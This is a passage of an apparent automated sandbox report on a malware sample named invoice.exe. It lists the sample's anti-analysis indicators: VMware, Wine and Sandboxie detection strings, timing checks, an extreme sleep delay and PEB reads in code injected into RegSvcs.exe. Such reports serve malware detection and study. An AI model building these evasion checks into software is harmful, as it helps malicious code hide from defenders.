Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00421383 push eax; ret	1_2_00421389
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_004225BD push ds; ret	1_2_004225BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_0040CEEE push eax; ret	1_2_0040CEF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_0041AF34 push ecx; ret	1_2_0041AF57

Source: initial sample

Static PE information: section name: .text entropy: 6.830189645402675

Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: invoice.exe PID: 1784, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: invoice.exe, 00000000.00000002.277154504.00000000026F1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: invoice.exe, 00000000.00000002.277154504.00000000026F1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL

Source: C:\Users\user\Desktop\invoice.exe TID: 5152

Thread sleep time: -922337203685477s >= -30000s

Jump to behavior

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\msiexec.exe	Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 1_2_00FE6A60 rdtscp

1_2_00FE6A60

Source: C:\Users\user\Desktop\invoice.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

API coverage: 5.6 %

Source: C:\Users\user\Desktop\invoice.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\invoice.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: explorer.exe, 00000002.00000000.304057506.00000000090D8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}z,
Source: invoice.exe, 00000000.00000002.277154504.00000000026F1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware SVGA IIOData Source=localhost\sqlexpress;Initial Catalog=dbSMS;Integrated Security=True
Source: invoice.exe, 00000000.00000002.277154504.00000000026F1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware
Source: invoice.exe, 00000000.00000002.277154504.00000000026F1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: invoice.exe, 00000000.00000002.277154504.00000000026F1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: invoice.exe, 00000000.00000002.277154504.00000000026F1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMWARE
Source: explorer.exe, 00000002.00000000.295902224.0000000007166000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
Source: explorer.exe, 00000002.00000000.304057506.00000000090D8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: invoice.exe, 00000000.00000002.277154504.00000000026F1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000002.00000000.304057506.00000000090D8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i,
Source: explorer.exe, 00000002.00000000.303005952.0000000008FD3000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&0000001 ZG
Source: explorer.exe, 00000002.00000000.333816371.0000000005063000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}9'
Source: invoice.exe, 00000000.00000002.277154504.00000000026F1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: invoice.exe, 00000000.00000002.277154504.00000000026F1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware SVGA II
Source: invoice.exe, 00000000.00000002.277154504.00000000026F1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: explorer.exe, 00000002.00000000.303005952.0000000008FD3000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 1_2_00FE6A60 rdtscp

1_2_00FE6A60

Source: C:\Users\user\Desktop\invoice.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FB58EC mov eax, dword ptr fs:[00000030h]	1_2_00FB58EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FDB8E4 mov eax, dword ptr fs:[00000030h]	1_2_00FDB8E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FDB8E4 mov eax, dword ptr fs:[00000030h]	1_2_00FDB8E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FB40E1 mov eax, dword ptr fs:[00000030h]	1_2_00FB40E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FB40E1 mov eax, dword ptr fs:[00000030h]	1_2_00FB40E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FB40E1 mov eax, dword ptr fs:[00000030h]	1_2_00FB40E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FEF0BF mov ecx, dword ptr fs:[00000030h]	1_2_00FEF0BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FEF0BF mov eax, dword ptr fs:[00000030h]	1_2_00FEF0BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FEF0BF mov eax, dword ptr fs:[00000030h]	1_2_00FEF0BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FF90AF mov eax, dword ptr fs:[00000030h]	1_2_00FF90AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FE20A0 mov eax, dword ptr fs:[00000030h]	1_2_00FE20A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FE20A0 mov eax, dword ptr fs:[00000030h]	1_2_00FE20A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FE20A0 mov eax, dword ptr fs:[00000030h]	1_2_00FE20A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FE20A0 mov eax, dword ptr fs:[00000030h]	1_2_00FE20A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FE20A0 mov eax, dword ptr fs:[00000030h]	1_2_00FE20A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FE20A0 mov eax, dword ptr fs:[00000030h]	1_2_00FE20A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FB9080 mov eax, dword ptr fs:[00000030h]	1_2_00FB9080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_010749A4 mov eax, dword ptr fs:[00000030h]	1_2_010749A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_010749A4 mov eax, dword ptr fs:[00000030h]	1_2_010749A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_010749A4 mov eax, dword ptr fs:[00000030h]	1_2_010749A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_010749A4 mov eax, dword ptr fs:[00000030h]	1_2_010749A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_010369A6 mov eax, dword ptr fs:[00000030h]	1_2_010369A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FD0050 mov eax, dword ptr fs:[00000030h]	1_2_00FD0050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FD0050 mov eax, dword ptr fs:[00000030h]	1_2_00FD0050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_010351BE mov eax, dword ptr fs:[00000030h]	1_2_010351BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_010351BE mov eax, dword ptr fs:[00000030h]	1_2_010351BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_010351BE mov eax, dword ptr fs:[00000030h]	1_2_010351BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_010351BE mov eax, dword ptr fs:[00000030h]	1_2_010351BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FDA830 mov eax, dword ptr fs:[00000030h]	1_2_00FDA830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FDA830 mov eax, dword ptr fs:[00000030h]	1_2_00FDA830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FDA830 mov eax, dword ptr fs:[00000030h]	1_2_00FDA830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FDA830 mov eax, dword ptr fs:[00000030h]	1_2_00FDA830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FE002D mov eax, dword ptr fs:[00000030h]	1_2_00FE002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FE002D mov eax, dword ptr fs:[00000030h]	1_2_00FE002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FE002D mov eax, dword ptr fs:[00000030h]	1_2_00FE002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FE002D mov eax, dword ptr fs:[00000030h]	1_2_00FE002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FE002D mov eax, dword ptr fs:[00000030h]	1_2_00FE002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FCB02A mov eax, dword ptr fs:[00000030h]	1_2_00FCB02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FCB02A mov eax, dword ptr fs:[00000030h]	1_2_00FCB02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FCB02A mov eax, dword ptr fs:[00000030h]	1_2_00FCB02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FCB02A mov eax, dword ptr fs:[00000030h]	1_2_00FCB02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_010441E8 mov eax, dword ptr fs:[00000030h]	1_2_010441E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01037016 mov eax, dword ptr fs:[00000030h]	1_2_01037016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01037016 mov eax, dword ptr fs:[00000030h]	1_2_01037016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01037016 mov eax, dword ptr fs:[00000030h]	1_2_01037016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FBB1E1 mov eax, dword ptr fs:[00000030h]	1_2_00FBB1E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FBB1E1 mov eax, dword ptr fs:[00000030h]	1_2_00FBB1E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FBB1E1 mov eax, dword ptr fs:[00000030h]	1_2_00FBB1E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01084015 mov eax, dword ptr fs:[00000030h]	1_2_01084015
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01084015 mov eax, dword ptr fs:[00000030h]	1_2_01084015
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FD99BF mov ecx, dword ptr fs:[00000030h]	1_2_00FD99BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FD99BF mov ecx, dword ptr fs:[00000030h]	1_2_00FD99BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FD99BF mov eax, dword ptr fs:[00000030h]	1_2_00FD99BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FD99BF mov ecx, dword ptr fs:[00000030h]	1_2_00FD99BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FD99BF mov ecx, dword ptr fs:[00000030h]	1_2_00FD99BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FD99BF mov eax, dword ptr fs:[00000030h]	1_2_00FD99BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FD99BF mov ecx, dword ptr fs:[00000030h]	1_2_00FD99BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FD99BF mov ecx, dword ptr fs:[00000030h]	1_2_00FD99BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FD99BF mov eax, dword ptr fs:[00000030h]	1_2_00FD99BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FD99BF mov ecx, dword ptr fs:[00000030h]	1_2_00FD99BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FD99BF mov ecx, dword ptr fs:[00000030h]	1_2_00FD99BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FD99BF mov eax, dword ptr fs:[00000030h]	1_2_00FD99BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FE61A0 mov eax, dword ptr fs:[00000030h]	1_2_00FE61A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FE61A0 mov eax, dword ptr fs:[00000030h]	1_2_00FE61A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FE2990 mov eax, dword ptr fs:[00000030h]	1_2_00FE2990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FE4190 mov eax, dword ptr fs:[00000030h]	1_2_00FE4190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01072073 mov eax, dword ptr fs:[00000030h]	1_2_01072073
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FEA185 mov eax, dword ptr fs:[00000030h]	1_2_00FEA185
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01081074 mov eax, dword ptr fs:[00000030h]	1_2_01081074
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FDC182 mov eax, dword ptr fs:[00000030h]	1_2_00FDC182
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01033884 mov eax, dword ptr fs:[00000030h]	1_2_01033884
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01033884 mov eax, dword ptr fs:[00000030h]	1_2_01033884
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FBB171 mov eax, dword ptr fs:[00000030h]	1_2_00FBB171
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FBB171 mov eax, dword ptr fs:[00000030h]	1_2_00FBB171
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FBC962 mov eax, dword ptr fs:[00000030h]	1_2_00FBC962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FDB944 mov eax, dword ptr fs:[00000030h]	1_2_00FDB944
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FDB944 mov eax, dword ptr fs:[00000030h]	1_2_00FDB944
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FE513A mov eax, dword ptr fs:[00000030h]	1_2_00FE513A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FE513A mov eax, dword ptr fs:[00000030h]	1_2_00FE513A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_0104B8D0 mov eax, dword ptr fs:[00000030h]	1_2_0104B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_0104B8D0 mov ecx, dword ptr fs:[00000030h]	1_2_0104B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_0104B8D0 mov eax, dword ptr fs:[00000030h]	1_2_0104B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_0104B8D0 mov eax, dword ptr fs:[00000030h]	1_2_0104B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_0104B8D0 mov eax, dword ptr fs:[00000030h]	1_2_0104B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_0104B8D0 mov eax, dword ptr fs:[00000030h]	1_2_0104B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FD4120 mov eax, dword ptr fs:[00000030h]	1_2_00FD4120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FD4120 mov eax, dword ptr fs:[00000030h]	1_2_00FD4120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FD4120 mov eax, dword ptr fs:[00000030h]	1_2_00FD4120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FD4120 mov eax, dword ptr fs:[00000030h]	1_2_00FD4120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FD4120 mov ecx, dword ptr fs:[00000030h]	1_2_00FD4120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FB9100 mov eax, dword ptr fs:[00000030h]	1_2_00FB9100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FB9100 mov eax, dword ptr fs:[00000030h]	1_2_00FB9100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FB9100 mov eax, dword ptr fs:[00000030h]	1_2_00FB9100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FE2AE4 mov eax, dword ptr fs:[00000030h]	1_2_00FE2AE4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_0107131B mov eax, dword ptr fs:[00000030h]	1_2_0107131B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FE2ACB mov eax, dword ptr fs:[00000030h]	1_2_00FE2ACB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FCAAB0 mov eax, dword ptr fs:[00000030h]	1_2_00FCAAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FCAAB0 mov eax, dword ptr fs:[00000030h]	1_2_00FCAAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FEFAB0 mov eax, dword ptr fs:[00000030h]	1_2_00FEFAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01088B58 mov eax, dword ptr fs:[00000030h]	1_2_01088B58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FB52A5 mov eax, dword ptr fs:[00000030h]	1_2_00FB52A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FB52A5 mov eax, dword ptr fs:[00000030h]	1_2_00FB52A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FB52A5 mov eax, dword ptr fs:[00000030h]	1_2_00FB52A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FB52A5 mov eax, dword ptr fs:[00000030h]	1_2_00FB52A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FB52A5 mov eax, dword ptr fs:[00000030h]	1_2_00FB52A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FED294 mov eax, dword ptr fs:[00000030h]	1_2_00FED294
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FED294 mov eax, dword ptr fs:[00000030h]	1_2_00FED294
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FF927A mov eax, dword ptr fs:[00000030h]	1_2_00FF927A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_0106D380 mov ecx, dword ptr fs:[00000030h]	1_2_0106D380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_0107138A mov eax, dword ptr fs:[00000030h]	1_2_0107138A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FF5A69 mov eax, dword ptr fs:[00000030h]	1_2_00FF5A69
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FF5A69 mov eax, dword ptr fs:[00000030h]	1_2_00FF5A69
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FF5A69 mov eax, dword ptr fs:[00000030h]	1_2_00FF5A69
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01085BA5 mov eax, dword ptr fs:[00000030h]	1_2_01085BA5
